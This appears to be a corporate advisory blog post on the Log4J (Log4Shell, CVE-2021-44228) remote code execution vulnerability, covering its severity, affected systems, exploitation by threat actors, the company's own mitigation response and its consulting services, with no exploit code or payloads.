Log4J Zero-Day Exploitation: What You Need to Know
Widespread zero-day exploitation is underway for a Log4J vulnerability (CVE-2021-44228) enabling remote code execution (RCE) if exploitation is successful. A significant number of popular and integrated solutions are impacted and are actively being exploited by adversaries.
In this article
Log4J, aka Log4Shell, a wide number of solutions including but not limited to: servers and clients running Java using the Log4J framework, Elasticsearch, Apache Struts, appliances using Java, log forwarding chaining that may result in exposure for exploitation, cloud solutions (e.g., iCloud on laptops), and Supervisory Control and Data Acquisition (SCADA) systems.
Confirmed exploitation is underway in the wild via multiple adversaries including reports of nation-state Advanced Persistent Threat (APT) actors, and eCrime ransomware, Trojans, Distributed Denial of Service (DDoS) malware and high profile mature threats including Mirai.
How critical is the attack?
Severity is rated from a 1 – 10 on the CVSS scale, with Log4J rated as 10 out of 10. It was publicly disclosed on Dec. 9, 2021. Exploitation, if successful, is a worst-case scenario resulting in remote code execution (RCE) and compromise of affected assets.
Due to the diverse and widespread nature of integrations and exposure, combined with the highest possible severity for a vulnerability, and widespread active exploitation — this vulnerability is an imminent threat for all organizations vulnerable to attack.
Unlike other exploits and attack vectors, this particular risk is akin to that of a cluster bomb with multiple vectors, architectures and embedded vulnerabilities easily and reliably exploited by nation-state and eCrime actors.
Are we impacted?
WWT is aware of the RCE vulnerability in Log4j (CVE-2021-44228) and is actively engaged to mitigate threats. On Friday, December 10th, we implemented multiple strategies to prevent the exploitation of the Log4j vulnerability while we update the applications using impacted versions of Log4j. Additionally, we have implemented threat-specific detective capabilities to alert on unusual behavior and our skilled security team is prepared to respond quickly.
We have engaged with our key third party suppliers to ensure that they are aware of the vulnerability and are taking appropriate steps to remediate.
WWT has not found indications of successful exploitation of the vulnerability in our information systems. We will remain vigilant in monitoring and responding to the threat as it evolves.
What should my organization do?
We recommend due diligence in threat hunting the known indicators of compromise (IOCs) and anomalous activity related to disclosure and exploitation of this vulnerability. Due diligence is recommended for all organizations during this complex and integrated vulnerability threat impacting multiple technologies and layers of architecture within organizations worldwide.
We recommends the following primary references when performing due diligence:
The WWT Virtual CISO program embeds seasoned cybersecurity consultants within the environment to help lead initiatives, like incident response and threat mitigation, and assist with program development, maturation and management.
Our Threat and Vulnerability Management Program offerings empower you to uncover and strategically address threats and vulnerabilities with a risk-based methodology, leveraging security automation to increase efficacy, with the ultimate goal of reducing risk across your organization's environment.
WWT's cybersecurity consultants possess more than 450+ total years of security experience, with roughly 80 certifications and 100 years of government agency experience.